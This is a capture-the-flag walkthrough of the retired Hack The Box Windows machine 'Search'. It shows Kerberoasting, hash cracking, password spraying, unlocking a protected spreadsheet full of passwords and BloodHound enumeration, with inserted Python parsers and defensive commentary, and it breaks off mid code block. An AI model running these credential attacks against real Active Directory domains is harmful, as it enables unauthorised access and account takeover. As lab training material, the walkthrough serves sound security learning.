Retired machine "Search" from Hack The Box (VIP required)
We run the first Nmap scan:
$ nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn -oG allports 10.10.11.129
We follow up with a second Nmap scan (service and version detection on the open ports):
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNSPlus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Search — Just Testing IIS
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-12-24 18:38:51Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
|_ssl-date: 2021-12-24T18:40:22+00:00; +1s from scanner time.
443/tcp open ssl/http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Search — Just Testing IIS
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
|_ssl-date: 2021-12-24T18:40:22+00:00; +1s from scanner time.
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
|_ssl-date: 2021-12-24T18:40:22+00:00; +1s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
|_ssl-date: 2021-12-24T18:40:22+00:00; +1s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
|_ssl-date: 2021-12-24T18:40:22+00:00; +1s from scanner time.
8172/tcp open ssl/http Microsoft IIS httpd 10.
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title.
| ssl-cert: Subject: commonName=WMSvc-SHA2-RESEARCH
| Not valid before: 2020-04-07T09:05:25
|_Not valid after: 2030-04-05T09:05:25
|_ssl-date: 2021-12-24T18:40:22+00:00; +1s from scanner time.
| tls-alpn:
|_ http/1.1
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc Microsoft Windows RPC
49691/tcp open msrpc Microsoft Windows RPC
49701/tcp open msrpc Microsoft Windows RPC
49725/tcp open msrpc Microsoft Windows RPC
Service Info: Host: RESEARCH; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-12-24T18:39:43
|_ start_date: N/A
Seeing this, we add the machine's domain and commonName to /etc/hosts --> search.htb research.htb
We keep enumerating, starting with the web page:
http://10.10.11.129 [200 OK] Bootstrap, Country[RESERVED][ZZ], Email[youremail@search.htb], HTML5, HTTPServer[Microsoft-IIS/10.0], IP[10.10.11.129], JQuery[3.3.1], Microsoft-IIS[10.0], Script, Title[Search — Just Testing IIS], X-Powered-By[ASP.NET]
We enumerate the web page visually.
We find the following user and credential --> "http://10.10.11.129/images/slide_2.jpg"
User: "Hope Sharp" --> Pass: "IsolationIsKey?"
We verify the obtained credential for the user hope.sharp with CrackMapExec:
# crackmapexec smb 10.10.11.129 -u hope.sharp -p 'IsolationIsKey?'
SMB 10.10.11.129 445 RESEARCH [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.129 445 RESEARCH [+] search.htb\hope.sharp:IsolationIsKey?
We try to connect to the SMB shares:
# smbmap -u '' -H 10.10.11.129
[+] IP: 10.10.11.129:445 Name: search.htb
# smbmap -u 'hope.sharp' -p 'IsolationIsKey?' -H 10.10.11.129
[+] IP: 10.10.11.129:445 Name: search.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
CertEnroll READ ONLY Active Directory Certificate Services share
helpdesk NO ACCESS
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
RedirectedFolders$ READ, WRITE
SYSVOL READ ONLY Logon server share
We enumerate system users via SMB:
# smbmap -u 'hope.sharp' -p 'IsolationIsKey?' -H 10.10.11.129 -r 'RedirectedFolders$'
[+] IP: 10.10.11.129:445 Name: search.htb
Disk Permissions Comment
---- ----------- -------
RedirectedFolders$ READ, WRITE
.\RedirectedFolders$\*
dr--r--r-- 0 Mon Jun 6 11:47:52 2022 .
dr--r--r-- 0 Mon Jun 6 11:47:52 2022 ..
dr--r--r-- 0 Tue Apr 7 20:12:58 2020 abril.suarez
dr--r--r-- 0 Fri Jul 31 15:11:32 2020 Angie.Duffy
dr--r--r-- 0 Fri Jul 31 14:35:32 2020 Antony.Russo
dr--r--r-- 0 Tue Apr 7 20:32:31 2020 belen.compton
dr--r--r-- 0 Fri Jul 31 14:37:36 2020 Cameron.Melendez
dr--r--r-- 0 Tue Apr 7 20:15:09 2020 chanel.bell
dr--r--r-- 0 Fri Jul 31 15:09:07 2020 Claudia.Pugh
dr--r--r-- 0 Fri Jul 31 14:02:04 2020 Cortez.Hickman
dr--r--r-- 0 Tue Apr 7 20:20:08 2020 dax.santiago
dr--r--r-- 0 Fri Jul 31 13:55:34 2020 Eddie.Stevens
dr--r--r-- 0 Thu Apr 9 22:04:11 2020 edgar.jacobs
dr--r--r-- 0 Fri Jul 31 14:39:50 2020 Edith.Walls
dr--r--r-- 0 Tue Apr 7 20:23:13 2020 eve.galvan
dr--r--r-- 0 Tue Apr 7 20:29:22 2020 frederick.cuevas
dr--r--r-- 0 Thu Apr 9 16:34:41 2020 hope.sharp
dr--r--r-- 0 Tue Apr 7 20:07:00 2020 jayla.roberts
dr--r--r-- 0 Fri Jul 31 15:01:06 2020 Jordan.Gregory
dr--r--r-- 0 Thu Apr 9 22:11:39 2020 payton.harmon
dr--r--r-- 0 Fri Jul 31 13:44:32 2020 Reginald.Morton
dr--r--r-- 0 Tue Apr 7 20:10:25 2020 santino.benjamin
dr--r--r-- 0 Fri Jul 31 14:21:42 2020 Savanah.Velazquez
dr--r--r-- 0 Thu Nov 18 02:01:45 2021 sierra.frye
dr--r--r-- 0 Thu Apr 9 22:14:26 2020 trace.ryan
We build a list of potential users:
# smbmap -u 'hope.sharp' -p 'IsolationIsKey?' -H 10.10.11.129 -r 'RedirectedFolders$' | awk 'NF{print $NF}' | tail -n 23 > "users.txt"
abril.suarez
Angie.Duffy
Antony.Russo
belen.compton
Cameron.Melendez
chanel.bell
Claudia.Pugh
Cortez.Hickman
dax.santiago
Eddie.Stevens
edgar.jacobs
Edith.Walls
eve.galvan
frederick.cuevas
hope.sharp
jayla.roberts
Jordan.Gregory
payton.harmon
Reginald.Morton
santino.benjamin
Savanah.Velazquez
sierra.frye
trace.ryan
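The awk pipeline above works because the share happens to list exactly 23 folders; it silently breaks if a file or an extra entry appears. As an added example (not part of the original writeup), this Python parser reads the smbmap listing format itself, keeps only directory entries, drops `.` and `..`, and de-duplicates case-insensitively. The sample listing is constructed from a few of the entries shown above, with two file entries added to show they are filtered out.

```python
import re
from typing import List, Tuple

# Constructed sample: a handful of lines in smbmap's listing format, not the full
# share. Names may contain spaces ("Microsoft Edge.lnk"), so they are matched last.
SAMPLE_LISTING = """\
[+] IP: 10.10.11.129:445 Name: search.htb
Disk Permissions Comment
---- ----------- -------
RedirectedFolders$ READ, WRITE
.\\RedirectedFolders$\\*
dr--r--r-- 0 Mon Jun  6 11:47:52 2022 .
dr--r--r-- 0 Mon Jun  6 11:47:52 2022 ..
dr--r--r-- 0 Tue Apr  7 20:12:58 2020 abril.suarez
dr--r--r-- 0 Fri Jul 31 15:11:32 2020 Angie.Duffy
fr--r--r-- 282 Mon Aug 10 12:02:16 2020 desktop.ini
fr--r--r-- 1450 Thu Apr  9 22:05:03 2020 Microsoft Edge.lnk
dr--r--r-- 0 Thu Nov 18 02:01:45 2021 sierra.frye
"""

# One listing line: type flag (d = directory, f = file), nine permission
# characters, size, timestamp, then the name.
ENTRY_RE = re.compile(
    r"^([df])([rwx-]{9})\s+(\d+)\s+"
    r"(\w{3} \w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2} \d{4})\s+(.*)$"
)


def parse_listing(text: str) -> List[Tuple[str, int, str]]:
    """Return (kind, size, name) for every file/directory line in an smbmap listing."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line.rstrip())
        if m:
            kind, _perms, size, _ts, name = m.groups()
            entries.append((kind, int(size), name))
    return entries


def candidate_users(text: str) -> List[str]:
    """Directory names under the share, excluding '.' and '..', one per
    redirected profile folder. AD usernames are case-insensitive, so the list
    is de-duplicated case-insensitively while keeping the original spelling."""
    seen = set()
    users = []
    for kind, _size, name in parse_listing(text):
        if kind != "d" or name in (".", ".."):
            continue
        if name.lower() not in seen:
            seen.add(name.lower())
            users.append(name)
    return users


if __name__ == "__main__":
    # Equivalent of: smbmap ... -r 'RedirectedFolders$' | <parser> > users.txt
    print("\n".join(candidate_users(SAMPLE_LISTING)))
```

Feed it the real smbmap output on stdin (`smbmap ... | python3 parse_smbmap.py`) and the result is the same users.txt, without depending on the folder count.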
I run an AS-REP Roasting attack with the user list we found:
We find no AS-REP Roastable user.
We run a Kerberoasting attack, since we have credentials for the user hope.sharp:
# GetUserSPNs.py search.htb/hope.sharp:'IsolationIsKey?'
Impacket v0.9.24.dev1+20210827.162957.5aa97fa7 - Copyright 2021 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
--------------------------------- ------- -------- -------------------------- --------- ----------
RESEARCH/web_svc.search.htb:60001 web_svc 2020-04-09 14:59:11.329031 <never>
# GetUserSPNs.py search.htb/hope.sharp:'IsolationIsKey?' -request
Impacket v0.9.24.dev1+20210827.162957.5aa97fa7 - Copyright 2021 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
--------------------------------- ------- -------- -------------------------- --------- ----------
RESEARCH/web_svc.search.htb:60001 web_svc 2020-04-09 14:59:11.329031 <never>
$krb5tgs$23$*web_svc$SEARCH.HTB$search.htb/web_svc*$cbf7ed318a7ad8cef8eb9e0e46d358f2$bf63b6d423102abf531eb367994089d64a58d07aa240148ae60a26dd7e4c556b5a5916833b383160108453c1c1ee2cce944fa0a37024e5843d01c522a7a3169d622839224ae5132b1a83b77d2c6d0157fd046088594e020325b94c4adc9bfb3cec364a71962220599f0fede8af038bbc894748faade1ac12305969d26705a97902f3e8ea4ed9073a03c21ff05681f6da028330c3a399a006111936fdccf0fa74f8f97e4c9f8ab1fa410d9a1814ab455d9c4402a54a0ec8011b62d076858471b66413743908639c886cf4f6735605c44fc82794d87231cfab376d6aba77654634c293afa887fde00e430a2be1c381608a0d49ec454d7017f137c1308347702aa0e34f144ac7d917984e5d46dc64d06212bc292bb5e3a9f47b3bb2eed119ca8477250f70246882243dde35cbee1d206ffb0f01362aceb7dd6a96c12ebb40cd94e4d7301123556c1506218961effc6d5bd3be6cae7d312a9f9e2a702132c385cf8cb7b790a3b6d1aa81fc9cb424805dbac398d35f2ffd3dd41e1a3014bbc41933b298c18796890c164ac99ff19581a67be244242e033ee6541596c57055a84c47e05be885cca5ed5f6db6e99036a2ab307c1b07bb96f0618267831f7fe203d16766318c109893b7b516bdda7eb07c2810c7dd6ac21cd0f3e738c82a0de6244d2cc83fc69edd068fe5912cfedb7933aa64fd5b020a575dc297f5a4ca4b38d0287cd8393219ad552f0bdfc0a487a44100fa0732d5477f2e7571d965e1d2e4ecdff110a28b35b4c53010d7d737c4a11614f679f86dd06b9e161825bcdc400c146a0cf2b43816bb4fcc22f86ca98c90f13d7f807f221d5c5b7f9cc136249432ddcb50be81d2bfc7d62a085ee7cbc2ded6a2b655abf119bb1d1a16116354b4f83e35ab2842f77a44f1156749b2c96ab21b25bd6b971260350ef6446f0674ecf409bc4b0b5d9f5adc4fdc729177e9a7c5fad3ac215ffca8e32e2f6a944efd3f0c630c74f17529631599eb24e1363056f3f544b6951a8b0749065c90f60b4bcf2c431f3c0827fc7135a4c22fdc3189a56bf03851ba0c97bfa5379e18912c0bba137b360ab1b9e44a921176e3d0f2f961bb4fd1ff3bcbb0d7b4b5e82a95ea6d4bbb1896cd36f665b05a8e63c3e9b7885e11b9b2a0c84b946ad34985f4215db8c075127149baae3a4e967e7754790c701f8fabb802ae25d605446581ad6e84bb30445fb49c87ebdb392678a78dccfe9c77a0cd724d143dd2051a7f4dc21ccd1d83ce673354fc4ef171dff5f9bc8bfe4cc72c4f4ed3c538f01129b46ea227c0b378555c807fee342a2fde76aebcb8dec3535d9ae58e22310a4b7483c023047e10c46efbe
f021ed13c5a7034213aa2b7671569fdfaeb9632c2e8827e7f3f660d68837ed0fb069ad62575c649dd894d47e5f624d1fbd53a9653b0fed574873757319e4439f98ffb966844bc39b7a65915d18efdca4687893994680aa4
We try to crack the TGS to recover the password in clear text:
# john --wordlist=/usr/share/wordlists/rockyou.txt hash_web_svc
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
@3ONEmillionbaby (web_svc)
1g 0:00:00:03 DONE (2022-06-06 12:03) 0.3012g/s 3461Kp/s 3461Kc/s 3461KC/s @4208891ncv..?!*Dopey*?!
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
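The blob that john loaded is in the `$krb5tgs$23$` format: the etype (23 = RC4-HMAC), the service account, the realm, the SPN, a 16-byte checksum and the ticket's encrypted part. Because RC4-HMAC keys are simply the NT hash of the account password, anyone holding a TGS for that SPN can test candidates offline at wordlist speed, which is why a weak `web_svc` password fell in three seconds. As an added example (not from the writeup), this Python parser splits such a hash into its fields; the sample value is constructed with placeholder hex, not the ticket above.

```python
import re
from dataclasses import dataclass

# Constructed sample in the John/hashcat layout; the checksum and encrypted
# part are placeholder hex, a real ticket is several kilobytes.
SAMPLE_HASH = (
    "$krb5tgs$23$*web_svc$SEARCH.HTB$search.htb/web_svc*"
    "$0123456789abcdef0123456789abcdef"
    "$" + "deadbeef" * 8
)

ETYPE_NAMES = {
    23: "rc4-hmac",
    17: "aes128-cts-hmac-sha1-96",
    18: "aes256-cts-hmac-sha1-96",
}

# $krb5tgs$<etype>$*<user>$<realm>$<spn>*$<checksum 16 bytes>$<enc-part>
KRB5TGS_23_RE = re.compile(
    r"^\$krb5tgs\$(?P<etype>\d+)\$\*(?P<user>[^$]+)\$(?P<realm>[^$]+)\$(?P<spn>[^*]+)\*"
    r"\$(?P<checksum>[0-9a-fA-F]{32})\$(?P<edata>[0-9a-fA-F]+)$"
)


@dataclass
class KerberoastHash:
    etype: int
    user: str
    realm: str
    spn: str
    checksum: bytes  # HMAC-MD5 over the encrypted part (RC4-HMAC, RFC 4757)
    edata: bytes     # ticket enc-part, encrypted under the service account's key

    @property
    def etype_name(self) -> str:
        return ETYPE_NAMES.get(self.etype, f"etype {self.etype}")

    @property
    def offline_crackable_with_nt_hash(self) -> bool:
        """RC4-HMAC keys are the unsalted NT hash of the password, so a
        wordlist attack needs only one MD4 per candidate."""
        return self.etype == 23


def parse_krb5tgs(s: str) -> KerberoastHash:
    """Parse a $krb5tgs$23$ hash; AES tickets (etype 17/18) use a different
    layout and are rejected rather than mis-parsed."""
    m = KRB5TGS_23_RE.match(s.strip())
    if not m:
        raise ValueError("not a $krb5tgs$23$-style hash")
    etype = int(m["etype"])
    if etype != 23:
        raise ValueError(f"etype {etype} is not RC4-HMAC; AES tickets use another layout")
    return KerberoastHash(
        etype=etype,
        user=m["user"],
        realm=m["realm"],
        spn=m["spn"],
        checksum=bytes.fromhex(m["checksum"]),
        edata=bytes.fromhex(m["edata"]),
    )


if __name__ == "__main__":
    h = parse_krb5tgs(SAMPLE_HASH)
    print(f"{h.user}@{h.realm} spn={h.spn} etype={h.etype_name} "
          f"enc-part={len(h.edata)} bytes crackable-as-NT-hash={h.offline_crackable_with_nt_hash}")
```

The defender's takeaway from the field layout: an SPN account whose tickets come back as etype 23 is exposed to exactly this offline attack, and the fix is a long random password (or a gMSA) plus AES-only encryption types on the account.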
I do a password spray with the user list and the newly obtained password:
# crackmapexec smb 10.10.11.129 -u users.txt -p '@3ONEmillionbaby' --continue-on-success
SMB 10.10.11.129 445 RESEARCH [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.129 445 RESEARCH [+] search.htb\web_svc:@3ONEmillionbaby
SMB 10.10.11.129 445 RESEARCH [+] search.htb\edgar.jacobs:@3ONEmillionbaby
I keep looking through the SMB shares with the new user edgar.jacobs:
# smbmap -u 'edgar.jacobs' -p '@3ONEmillionbaby' -H 10.10.11.129 -r 'RedirectedFolders$/edgar.jacobs/Desktop'
[+] IP: 10.10.11.129:445 Name: search.htb
Disk Permissions Comment
---- ----------- -------
RedirectedFolders$ READ, WRITE
.\RedirectedFolders$edgar.jacobs\Desktop\*
dw--w--w-- 0 Mon Aug 10 12:02:16 2020 .
dw--w--w-- 0 Mon Aug 10 12:02:16 2020 ..
dr--r--r-- 0 Thu Apr 9 22:05:29 2020 $RECYCLE.BIN
fr--r--r-- 282 Mon Aug 10 12:02:16 2020 desktop.ini
fr--r--r-- 1450 Thu Apr 9 22:05:03 2020 Microsoft Edge.lnk
fr--r--r-- 23130 Mon Aug 10 12:30:05 2020 Phishing_Attempt.xlsx
We find a new file, which we download to our attacking machine:
# smbmap -u 'edgar.jacobs' -p '@3ONEmillionbaby' -H 10.10.11.129 --download 'RedirectedFolders$/edgar.jacobs/Desktop/Phishing_Attempt.xlsx'
[+] Starting download: RedirectedFolders$\edgar.jacobs\Desktop\Phishing_Attempt.xlsx (23130 bytes)
[+] File output to: /home/pro/Escritorio/HTB/Search/content/10.10.11.129-RedirectedFolders_edgar.jacobs_Desktop_Phishing_Attempt.xlsx
We move the file to an empty folder and open it. On opening it we see that column 'C' is missing (the sheet is protected), so we 'unzip' the file to bypass the Excel restriction.
Procedure to follow:
unzip Phishing_Attempt.xlsx
sed -i 's/<sheetProtection[^>]*>//' xl/worksheets/sheet2.xml
zip -fr Phishing_Attempt.xlsx *
# ls
'[Content_Types].xml' docProps Phishing_Attempt.xlsx _rels xl
# We edit sheet2.xml to remove the <sheetProtection> element and zip the file back up, which removes the protection
# zip -fr Phishing_Attempt.xlsx *
freshening: xl/worksheets/sheet2.xml (deflated 73%)
# ls
'[Content_Types].xml' docProps Phishing_Attempt.xlsx _rels xl
# wps Phishing_Attempt.xlsx
Firstname Lastname Password Username
Payton Harmon ;;36!cried!INDIA!year!50;; Payton.Harmon
Cortez Hickman ..10-time-TALK-proud-66.. Cortez.Hickman
Bobby Wolf ??47^before^WORLD^surprise^91?? Bobby.Wolf
Margaret Robinson //51+mountain+DEAR+noise+83// Margaret.Robinson
Scarlett Parks ++47|building|WARSAW|gave|60++ Scarlett.Parks
Eliezer Jordan !!05_goes_SEVEN_offer_83!! Eliezer.Jordan
Hunter Kirby ~~27%when%VILLAGE%full%00~~ Hunter.Kirby
Sierra Frye $$49=wide=STRAIGHT=jordan=28$$18 Sierra.Frye
Annabelle Wells ==95~pass~QUIET~austria~77== Annabelle.Wells
Eve Galvan //61!banker!FANCY!measure!25// Eve.Galvan
Jeramiah Fritz ??40:student:MAYOR:been:66?? Jeramiah.Fritz
Abby Gonzalez &&75:major:RADIO:state:93&& Abby.Gonzalez
Joy Costa **30*venus*BALL*office*42** Joy.Costa
Vincent Sutton **24&moment&BRAZIL&members&66** Vincent.Sutton
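The unzip/sed/zip trick works because `<sheetProtection>` is only a UI lock: the workbook is a zip of XML, the hidden column's cells are stored in plaintext inside it, and the element just tells Excel to refuse unhiding. Only file-level encryption (Excel's "Encrypt with Password") actually protects the data. As an added example (not from the writeup), the Python below builds a small constructed workbook with a protected sheet and a hidden column C, reports which sheets carry `<sheetProtection>`, strips it the same way the sed command does, and reads the "hidden" cell straight from the XML.

```python
import re
import tempfile
import zipfile
from pathlib import Path
from typing import List, Tuple

# Same pattern the writeup's sed uses; the element is normally self-closing.
SHEET_PROTECTION_RE = re.compile(r"<sheetProtection\b[^>]*>")
NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"

# Constructed worksheet XML: sheet2 has sheet protection, a hidden column C and
# one inline-string cell in that column. hashValue/saltValue are placeholders.
SHEET1_XML = f'<?xml version="1.0" encoding="UTF-8"?><worksheet xmlns="{NS}"><sheetData/></worksheet>'
SHEET2_XML = (
    f'<?xml version="1.0" encoding="UTF-8"?><worksheet xmlns="{NS}">'
    '<sheetProtection algorithmName="SHA-512" hashValue="PLACEHOLDER" '
    'saltValue="PLACEHOLDER" spinCount="100000" sheet="1" objects="1" scenarios="1"/>'
    '<cols><col min="3" max="3" hidden="1"/></cols>'
    '<sheetData><row r="1"><c r="C1" t="inlineStr"><is><t>still-readable</t></is></c></row></sheetData>'
    '</worksheet>'
)


def build_sample_workbook(path: Path) -> None:
    """Write a minimal xlsx-shaped zip (enough structure for this example)."""
    with zipfile.ZipFile(path, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("xl/workbook.xml", "<workbook/>")
        z.writestr("xl/worksheets/sheet1.xml", SHEET1_XML)
        z.writestr("xl/worksheets/sheet2.xml", SHEET2_XML)


def _is_sheet(name: str) -> bool:
    return name.startswith("xl/worksheets/") and name.endswith(".xml")


def protected_sheets(path: Path) -> List[str]:
    """Sheet parts that carry a <sheetProtection> element."""
    with zipfile.ZipFile(path) as z:
        return [n for n in z.namelist()
                if _is_sheet(n) and SHEET_PROTECTION_RE.search(z.read(n).decode("utf-8"))]


def strip_sheet_protection(src: Path, dst: Path) -> int:
    """Copy the workbook without any <sheetProtection> elements (the sed + zip
    step of the writeup); returns how many elements were removed."""
    removed = 0
    with zipfile.ZipFile(src) as zin, zipfile.ZipFile(dst, "w", zipfile.ZIP_DEFLATED) as zout:
        for info in zin.infolist():
            data = zin.read(info.filename)
            if _is_sheet(info.filename):
                text, n = SHEET_PROTECTION_RE.subn("", data.decode("utf-8"))
                removed += n
                data = text.encode("utf-8")
            zout.writestr(info, data)
    return removed


def inline_strings(path: Path, sheet: str) -> List[str]:
    """Inline-string cell values read from the XML; hiding a column does not
    remove them from the file."""
    with zipfile.ZipFile(path) as z:
        return re.findall(r"<t>([^<]*)</t>", z.read(sheet).decode("utf-8"))


def demo() -> Tuple[List[str], int, List[str], List[str]]:
    with tempfile.TemporaryDirectory() as d:
        src = Path(d) / "Phishing_Attempt.xlsx"
        dst = Path(d) / "Phishing_Attempt_unprotected.xlsx"
        build_sample_workbook(src)
        before = protected_sheets(src)
        removed = strip_sheet_protection(src, dst)
        after = protected_sheets(dst)
        values = inline_strings(src, "xl/worksheets/sheet2.xml")
        return before, removed, after, values


if __name__ == "__main__":
    print(demo())
```

Point the same functions at a real `.xlsx` to check whether a workbook relies on sheet protection alone; if it does, treat anything "hidden" in it as already disclosed to whoever holds the file.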
We test the passwords found against the users found:
# crackmapexec smb 10.10.11.129 -u sierra.frye -p '$$49=wide=STRAIGHT=jordan=28$$18'
SMB 10.10.11.129 445 RESEARCH [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.129 445 RESEARCH [+] search.htb\sierra.frye:$$49=wide=STRAIGHT=jordan=28$$18
We check the SMB shares for this user:
# smbmap -u 'sierra.frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' -H 10.10.11.129 -r 'RedirectedFolders$/sierra.frye'
[+] IP: 10.10.11.129:445 Name: search.htb
Disk Permissions Comment
---- ----------- -------
RedirectedFolders$ READ, WRITE
.\RedirectedFolders$sierra.frye\*
dr--r--r-- 0 Thu Nov 18 02:01:45 2021 .
dr--r--r-- 0 Thu Nov 18 02:01:45 2021 ..
dw--w--w-- 0 Thu Nov 18 02:08:17 2021 Desktop
dw--w--w-- 0 Fri Jul 31 16:42:19 2020 Documents
dw--w--w-- 0 Fri Jul 31 16:45:36 2020 Downloads
fr--r--r-- 33 Thu Nov 18 02:01:45 2021 user.txt
# smbmap -u 'sierra.frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' -H 10.10.11.129 --download 'RedirectedFolders$/sierra.frye/user.txt'
[+] Starting download: RedirectedFolders$\sierra.frye\user.txt (33 bytes)
[+] File output to: /home/pro/Escritorio/HTB/Search/content/10.10.11.129-RedirectedFolders_sierra.frye_user.txt
# cat user.txt
39d6dde72c8e6b2a0d4exxxxxxxxxxxxxxxxx
We enumerate a bit more...
# smbmap -u 'sierra.frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' -H 10.10.11.129 -r 'RedirectedFolders$/sierra.frye/Downloads'
[+] IP: 10.10.11.129:445 Name: search.htb
Disk Permissions Comment
---- ----------- -------
RedirectedFolders$ READ, WRITE
.\RedirectedFolders$sierra.frye\Downloads\*
dw--w--w-- 0 Fri Jul 31 16:45:36 2020 .
dw--w--w-- 0 Fri Jul 31 16:45:36 2020 ..
dr--r--r-- 0 Thu Jul 30 19:25:57 2020 $RECYCLE.BIN
dr--r--r-- 0 Mon Aug 10 22:39:17 2020 Backups
fr--r--r-- 282 Fri Jul 31 16:42:18 2020 desktop.ini
# smbmap -u 'sierra.frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' -H 10.10.11.129 -r 'RedirectedFolders$/sierra.frye/Downloads/Backups'
[+] IP: 10.10.11.129:445 Name: search.htb
Disk Permissions Comment
---- ----------- -------
RedirectedFolders$ READ, WRITE
.\RedirectedFolders$sierra.frye\Downloads\Backups\*
dr--r--r-- 0 Mon Aug 10 22:39:17 2020 .
dr--r--r-- 0 Mon Aug 10 22:39:17 2020 ..
fr--r--r-- 2643 Fri Jul 31 17:04:11 2020 search-RESEARCH-CA.p12
fr--r--r-- 4326 Mon Aug 10 22:39:17 2020 staff.pfx
# smbmap -u 'sierra.frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' -H 10.10.11.129 --download 'RedirectedFolders$/sierra.frye/Downloads/Backups/staff.pfx'
[+] Starting download: RedirectedFolders$\sierra.frye\Downloads\Backups\staff.pfx (4326 bytes)
[+] File output to: /home/pro/Escritorio/HTB/Search/content/10.10.11.129-RedirectedFolders_sierra.frye_Downloads_Backups_staff.pfx
# smbmap -u 'sierra.frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' -H 10.10.11.129 --download 'RedirectedFolders$/sierra.frye/Downloads/Backups/search-RESEARCH-CA.p12'
[+] Starting download: RedirectedFolders$\sierra.frye\Downloads\Backups\search-RESEARCH-CA.p12 (2643 bytes)
[+] File output to: /home/pro/Escritorio/HTB/Search/content/10.10.11.129-RedirectedFolders_sierra.frye_Downloads_Backups_search-RESEARCH-CA.p12
Once both files are downloaded we see we have a .pfx file (whose password we can crack) and a certificate that we can import into Firefox to access some resource.
# pfx2john staff.pfx > hash_pfx
# john hash_pfx --show
staff.pfx:misspissy:::::staff.pfx
1 password hash cracked, 0 left
We fuzz the web page:
# wfuzz -c --hc=404 -t 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.10.11.129/FUZZ
Target: http://10.10.11.129/FUZZ
Total requests: 220548
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000232: 403 29 L 92 W 1233 Ch "staff"
000000003: 301 1 L 10 W 150 Ch "images"
000000190: 301 1 L 10 W 150 Ch "Images"
000000537: 301 1 L 10 W 147 Ch "css"
000000940: 301 1 L 10 W 146 Ch "js"
000002601: 403 29 L 92 W 1233 Ch "Staff"
000002758: 301 1 L 10 W 149 Ch "fonts"
Trying the "staff" path, we see that a client certificate is requested. We import the CA .p12 we downloaded; it asks for a password and we enter misspissy,
the password obtained for the .pfx file.
We reach a panel --> "https://10.10.11.129/staff/en-US/logon.aspx?ReturnUrl=%2fstaff%2f"
We log in with the user sierra.frye
and her password, machine name --> Research
We obtain an interactive console --> "https://10.10.11.129/staff/en-US/console.aspx"
With the user.txt flag obtained, we start Neo4j and enumerate with BloodHound to see how we could become Domain Admins.
Since we already have valid credentials we can use BloodHound.py
to collect information about the domain:
# python3 /opt/BloodHound.py/bloodhound.py -u hope.sharp -p "IsolationIsKey?" -d search.htb -ns 10.10.11.129 --zip
20220606130949_bloodhound.zip
We load the .zip into BloodHound, mark the users we already have as Owned, go to Shortest Paths and, from the user Sierra Frye, click "Shortest Paths from Owned Principals".
Sierra.Frye belongs to ---> Group: Birmingham-itsec@search.htb --> Group: ITSECT@search.htb --> "ReadGMSAPassword" --> user: BIR-ADFS-GMSA@SEARCH.HTB
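What BloodHound computes for that query is a breadth-first search from the owned nodes over the collected edges. As an added example (not from the writeup or BloodHound), the Python below runs the same search over a hand-built edge list that reproduces the chain above, plus two constructed users in a constructed "DOMAIN USERS" group that have no path. It also includes the reverse query a defender wants: every principal that can end up reading the gMSA password, which is what to audit before granting `PrincipalsAllowedToRetrieveManagedPassword` to a group.

```python
from collections import deque
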